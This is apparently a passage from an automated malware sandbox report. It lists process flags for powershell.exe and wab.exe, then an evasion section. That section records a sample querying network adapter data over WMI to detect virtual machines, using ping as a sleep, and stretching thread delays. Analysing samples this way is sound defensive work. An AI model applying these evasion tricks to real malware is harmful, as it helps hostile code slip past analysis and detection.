            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Uses ping.exe to sleep
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping google.com -n 1
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping google.com -n 1Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 580000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 24570000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 26570000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599782Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599658Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599407Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599282Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599172Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598688Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598563Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598452Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598219Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598081Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597953Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597844Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597723Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597594Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597469Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597359Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597250Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597141Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597031Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596922Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596811Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596688Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596578Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596469Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596344Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595610Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595360Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594989Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594860Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594735Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594610Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594110Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5109Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4807Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6146Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3666Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3201Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 6615Jump to behavior
            Source: C:\Windows\System32\wscript.exe TID: 6496Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep count: 6146 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep count: 3666 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7412Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -26747778906878833s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -600000s >= -30000sJump to behavior
